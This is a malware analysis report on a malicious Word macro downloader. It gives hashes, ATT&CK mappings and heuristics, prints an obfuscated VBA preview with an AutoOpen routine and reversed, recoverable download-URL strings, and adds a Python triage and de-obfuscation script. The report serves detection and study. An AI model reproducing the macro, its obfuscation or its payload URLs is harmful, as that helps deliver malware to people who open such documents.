Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 928689d09b091560…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 169.5 KB
Created: 2018-05-16 12:42:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 074af2cf5085801e0fce2d74e24155e0
SHA-1: 2add7200492c1644fb0c1ca60ad5a9a6e872c1a8
SHA-256: 928689d09b091560700d6c72b13c43ea500e5a561f9ba05b0a104cd596a80fba
Risk score: 142

Malware Insights

MITRE ATT&CK
T1566.001 Phishing: Spearphishing Attachment
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic

The critical finding is a Shell() call inside the VBA project: the macro can launch an external process. The project also defines Sub Autoopen (module zTCMCLsEMm), so the code runs as soon as the document is opened with macros enabled, without any further user interaction. The recovered source is heavily padded: most lines are dead stores such as `a = b`, `a = 12345` or CDbl() arithmetic over variables that are never assigned, which do nothing under On Error Resume Next. The real strings are assembled by a helper, VrwsC(), whose literals contain URL components written backwards (`//:p`, `oc.odafaz`, `moc`) together with `'+'` concatenation glue and a reversed `try{`, consistent with a reversed script or command line that reassembles download URLs at run time. The likely intent is therefore to download and execute a second-stage payload, a common delivery pattern. Two caveats for the reader: the Shell() call and the body of VrwsC() fall outside the truncated preview below, so the decoded command is not visible on this page; and the legacy WordBasic heuristic's statement that no modern VBA project was recovered is superseded here by the extracted macros.bas, which is a full VBA project.

Heuristics (5)

  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA code calls Shell(), which launches an external process with whatever command string the macro builds.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    An AutoOpen procedure is present; Word runs it when the document is opened with macros enabled.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier, present in any document that carries drawing markup, and is not an address the macro contacts. The sample's actual network indicators appear to sit reversed inside the VrwsC() string literals in the macro and are not surfaced as URLs by this heuristic.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 152,760 bytes
SHA-256: f94fde4c32520d41a32ad25301163518631d34817506015adc6893195fe18995
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "zTCMCLsEMm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub aifnRX(kSzKz)
jMPIT = GMwOdb
uVvuH = buGvHd + CDbl(29929 - dPmzE - ALkVFJ + CDbl(45973)) - 38925 - CDbl(30358)
PCMOdz = XrPXPZ
HiDId = 92680
End Sub
Sub RZwBi(ZowWHi)
jFRAqj = OGoHll
ObFPr = QwcPN + CDbl(90592 - PissP - vkBMCS + CDbl(94235)) - 41972 - CDbl(96046)
kpQzR = NsHQL
hcBnu = 38989
fNwrA = jMOCzu
Snsawz = EVzlzZ + CDbl(66352 - YLPXc - SzowP + CDbl(14407)) - 64700 - CDbl(98469)
qJWNuu = bqwZGJ
KsbHh = 76446
maRmz = EbhqME
JccLn = ojZaC + CDbl(9116 - jdGoA - LwDiF + CDbl(51779)) - 89747 - CDbl(9729)
zIGNBn = iPPTa
TNAOhq = 12323
End Sub
Sub VsqMtZ(tXktC)
kQTpD = iurYh
Mcqhq = DwEdQQ + CDbl(461 - Ozori - XqjwhY + CDbl(59055)) - 41959 - CDbl(53727)
iTJmhw = MhrpD
GADpu = 13497
GzuHCW = tASOhW
zwHNb = jcKmk + CDbl(38513 - cwdijO - aiZCkK + CDbl(6356)) - 43222 - CDbl(21786)
dHhjH = vcTpw
pIWikR = 94140
End Sub
Sub Autoopen()
On Error Resume Next
jiTaz = WFcQN
RvJcn = VrhGQ + CDbl(47973 - woRfC - mZofwo + CDbl(13075)) - 66592 - CDbl(75108)
qzDcjM = wtvfvF
cOuZAf = 10269
PnGYscEinpZ (Zqbnc + ZXJwwolIK + KojWi)
qGNwQ = uSmHuq
zCkuj = HcRZMA + CDbl(92401 - foFOIN - wVAzIQ + CDbl(71805)) - 74753 - CDbl(75848)
wlSdM = uzoah
hAwUB = 27985
End Sub
Sub hslcZA(jzXRWp)
HQPdFT = KPUnN
ozAnO = JGZKI + CDbl(87404 - fpzbXE - vZkhrw + CDbl(91100)) - 28305 - CDbl(42411)
RpMcrk = kDzjXh
HjcnZ = 26859
ziVcPP = wSbuk
tShBnF = rTELY + CDbl(84883 - aIUHpI - UGqzcU + CDbl(55602)) - 76527 - CDbl(71339)
mnkMo = bAUNw
iJEXkt = 77276
TFcHYL = BKkXDi
ZlHRlF = HVurqc + CDbl(64033 - FjjznE - KcncLZ + CDbl(79980)) - 67844 - CDbl(80184)
uzkTPT = iEMkh
hiJHE = 2044
End Sub
Sub Dvcsai(ItURlF)
wfzbpQ = RirwdM
uCSki = pwVrs + CDbl(72220 - zokuwc - lDMfP + CDbl(69818)) - 23723 - CDbl(74654)
kvzRY = rBhDD
zKFjE = 53728
End Sub

Attribute VB_Name = "czzwAvUqqmV"
Sub pClkwv(QkziN)
ZIntGw = IjKPn
wWEYAP = FOGLZ + CDbl(17461 - kLsiOj - bmjzj + CDbl(81296)) - 20647 - CDbl(79899)
sWzzw = MMzTBp
CcTzI = 51261
End Sub
Function ZXJwwolIK()
On Error Resume Next
rfADtV = XaQZAQ
NpcJp = zjhviO + CDbl(32100 - Eimhks - MWtGd + CDbl(27924)) - 77077 - CDbl(72329)
uAZCom = nSozKw
ViEzT = 93102
oziKn = kAFiiR
jGTsq = ZuKaXt + CDbl(51882 - wcjZb - OrBfw + CDbl(79673)) - 75339 - CDbl(44440)
vTDsXD = PShSG
iYGQM = 66326
Nwjtq = VrwsC("jR,pjl+Y1l/60Z0Y1l+Y1ldy4o/tY1l+Y1lneilY1l+Y1lc_te'+'nY1l+Y1lpsa/mY1l+Y1l'+'oc.odafaz//:pY1l+'+'Y1lt'+'th@Y1l+Y1l/gY1l+Y1l43lHC/Y1l+Y1lmoc", 55176 + 2 - 55176, 55176 + 132 - 55176)
XYIDJr = EotBpC
PGUBD = jNNrI + CDbl(2909 - NcYicE - JWLzjf + CDbl(26200)) - 21335 - CDbl(52197)
fcDGP = mPIVH
LQuHz = 54669
VjMqb = pqQZGS
WCqswo = DGuIw + CDbl(95081 - zbwWCb - WVpBd + CDbl(89308)) - 23404 - CDbl(48401)
RHUtC = wUpmU
OoDrd = 77531
Wrhpzhrzzj = VrwsC("Ou0Dl+Y1lifQY1l+Y1llnWiY1l+Y1lfY1l+Y1lQoDyY1l+Y1lpF.UYYxFe{yY1l+Y1lrtY1l+Y1l{)XCDAxFe'+' ni cfsaxFY1l+Y'+'1le(hcaY1'+'l+Y1lerY1l+Y143HE", 53680 + 5 - 53680, 53680 + 127 - 53680)
OTDEqV = jBrSu
ihdBi = wzicj + CDbl(30237 - vIjlJ - GWKFN + CDbl(5269)) - 56564 - CDbl(46430)
WvdXs = lhLBM
rskrW = 77977
EESVs = YhljR
ZWdwG = ssAKMi + CDbl(36746 - tYREN - NznJw + CDbl(35465)) - 45203 - CDbl(93602)
zzLHt = qvoBw
LCuroC = 38952
FGhZtNc = VrwsC("NY//:ptYOptQT", 67926 + 6 - 67926, 67926 + 6 - 67926)
AQhSGz = iTwnKv
DKAXZD = cdCOT + CDbl(3908 - tRKQDV - hRsBu + CDbl(86135)) - 17021 - CDbl(53156)
NowZzj = RcQZXm
EnzjoC = 76918
zpjPLv = Jzbarz
FLquA = PnOHHu + CDbl(23905 - lPkSIk - uoPmfI + CDbl(19811)) - 18830 - CDbl(14803)
hifvi = pSmbJ
ZHRjJY = 65870
wvRmv = VrwsC("tRdAlW+ktWenktW(Y1l+Y'+'1l. = UYYxFe;modnar )ktWtkY1l+Y1ltW+ktWceY1l+Y1ljbo-wktWY1l+j@", 45514 + 3 - 45514, 45514 + 80 - 45514)
IjMJKW = IUaFiG
aQhtCE = zVJnTP + CDbl(16053 - wwmbR - zRVkL + CDbl(69055)) - 64454 - CDbl(96315)
WfUqh = CQVdv
NDWqH = 35061
AWSDa = 
... (truncated)
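As an added worked example (not part of this report and not the analysis platform's own code), the Python script below reproduces the three macro findings above over an excerpt of the macros.bas preview and tests a de-obfuscation hypothesis for the VrwsC() literals. The sample input is copied from the preview lines shown on this page; the single Shell() line used as a positive case for the shell-out detector is constructed, because the report's Shell() finding lies beyond the visible preview. The reversal, the removal of the `'+'` glue and the separator token `Y1l` are the analyst's hypothesis drawn from the visible fragments (`//:p`, `oc.odafaz`, `moc`); VrwsC()'s body is not on the page, so whatever the recovery yields is a lead to confirm in a sandbox, not a decoded payload.

```python
"""Triage helpers for an olevba-extracted VBA module such as macros.bas.
Added example, not the analysis platform's code: auto-exec entry points, shell-out
primitives, dead-store stripping, and a reversal test for VrwsC() literals."""
import re

# Excerpt copied from the macros.bas preview on this page (Sub Autoopen and the first
# two VrwsC() calls of Function ZXJwwolIK); the full module is 152,760 bytes.
SAMPLE_VBA = r"""Sub Autoopen()
On Error Resume Next
jiTaz = WFcQN
RvJcn = VrhGQ + CDbl(47973 - woRfC - mZofwo + CDbl(13075)) - 66592 - CDbl(75108)
qzDcjM = wtvfvF
cOuZAf = 10269
PnGYscEinpZ (Zqbnc + ZXJwwolIK + KojWi)
End Sub
Function ZXJwwolIK()
On Error Resume Next
rfADtV = XaQZAQ
Nwjtq = VrwsC("jR,pjl+Y1l/60Z0Y1l+Y1ldy4o/tY1l+Y1lneilY1l+Y1lc_te'+'nY1l+Y1lpsa/mY1l+Y1l'+'oc.odafaz//:pY1l+'+'Y1lt'+'th@Y1l+Y1l/gY1l+Y1l43lHC/Y1l+Y1lmoc", 55176 + 2 - 55176, 55176 + 132 - 55176)
FGhZtNc = VrwsC("NY//:ptYOptQT", 67926 + 6 - 67926, 67926 + 6 - 67926)
End Function
"""

# Constructed line, NOT from the sample: the report's Shell() finding is outside the
# visible preview, so this gives the detector a positive case to exercise.
CONSTRUCTED_SHELL_LINE = 'x = Shell("cmd.exe /c calc", vbHide)'

AUTO_EXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
    r"(AutoOpen|AutoExec|AutoClose|AutoNew|Auto_Open|Document_Open|Document_Close|Workbook_Open)\s*\(",
    re.IGNORECASE | re.MULTILINE)
SHELL_OUT_RE = re.compile(r"\bShell\s*\(|\bShellExecute\b|WScript\.Shell|\bCreateObject\s*\(", re.IGNORECASE)
ASSIGN_RE = re.compile(r"^\s*\w+\s*=\s*(.+?)\s*$")
VRWSC_RE = re.compile(r'VrwsC\("([^"]*)"\s*,([^,]+),([^)]+)\)')

def auto_exec_entry_points(vba):
    """Procedures Word/Excel run on open/close with no user interaction (OLE_VBA_AUTOOPEN)."""
    return [m.group(1) for m in AUTO_EXEC_RE.finditer(vba)]

def shell_out_primitives(vba):
    """Distinct process-launch primitives present; Shell( is what OLE_VBA_SHELL keys on."""
    return sorted({re.sub(r"\s+", "", m.group(0)) for m in SHELL_OUT_RE.finditer(vba)})

def is_junk_line(line):
    """Dead store: `a = b`, `a = 12345`, or CDbl() arithmetic over never-assigned names.
    Without Option Explicit and under On Error Resume Next these evaluate to Empty/0."""
    m = ASSIGN_RE.match(line)
    if not m:
        return False
    rhs = m.group(1).replace("CDbl", "")
    if re.search(r"\w\s*\(", rhs):          # a remaining call means real work; keep it
        return False
    return re.fullmatch(r"[\w\s+\-()]+", rhs) is not None

def skeleton(vba):
    """The module minus padding: declarations, control flow, and lines that call something."""
    return [ln for ln in vba.splitlines() if ln.strip() and not is_junk_line(ln)]

def fold_int_expr(expr):
    """Collapse padding such as `55176 + 2 - 55176` to 2 without eval()."""
    return sum(int(tok.replace(" ", "")) for tok in re.findall(r"[+-]?\s*\d+", expr))

def vrwsc_calls(vba):
    """(literal, arg2, arg3) per VrwsC() call, with the padding arithmetic folded."""
    return [(m.group(1), fold_int_expr(m.group(2)), fold_int_expr(m.group(3)))
            for m in VRWSC_RE.finditer(vba)]

def reverse_and_strip(literal, sep="Y1l"):
    """HYPOTHESIS, not VrwsC()'s real logic (its body is not in the preview): the visible
    fragments `//:p`, `oc.odafaz`, `moc` read as URL parts backwards, so reverse the literal,
    drop the `'+'` concatenation glue and the reversed `Y1l+Y1l` separator pair. `sep` is
    the token seen in this sample; other builds would use a different one."""
    rev = literal[::-1].replace("'+'", "")
    rsep = sep[::-1]
    return rev.replace(f"{rsep}+{rsep}", "")

def candidate_hosts(text):
    """Hosts of any http(s):// URL that surfaced after recovery; leads to confirm in a sandbox."""
    return re.findall(r"https?://([A-Za-z0-9.-]+)", text)

def triage(vba):
    """One dict with everything an analyst reads before detonating the file."""
    nonblank = [ln for ln in vba.splitlines() if ln.strip()]
    return {
        "auto_exec": auto_exec_entry_points(vba),
        "shell_out": shell_out_primitives(vba),
        "total_lines": len(nonblank),
        "kept_lines": len(skeleton(vba)),
        "vrwsc": [(a2, a3, candidate_hosts(reverse_and_strip(lit))) for lit, a2, a3 in vrwsc_calls(vba)],
    }

if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

On the excerpt the stripper keeps 9 of 14 non-blank lines (the two procedure headers, the two On Error statements, the call out of Autoopen, the two VrwsC() calls and the two End statements), the folded VrwsC() arguments come out as small integers (2 and 132, 6 and 6), which is what a Mid()-style substring call would take, and the reversal of the first literal yields text containing `http://` followed by an aspnet_client path, with an `@` immediately before it, the usual separator when several fallback URLs are packed into one string. None of that proves the intended decode; it tells the analyst which function to read next in the full macros.bas and what to expect on the wire when the sample is detonated.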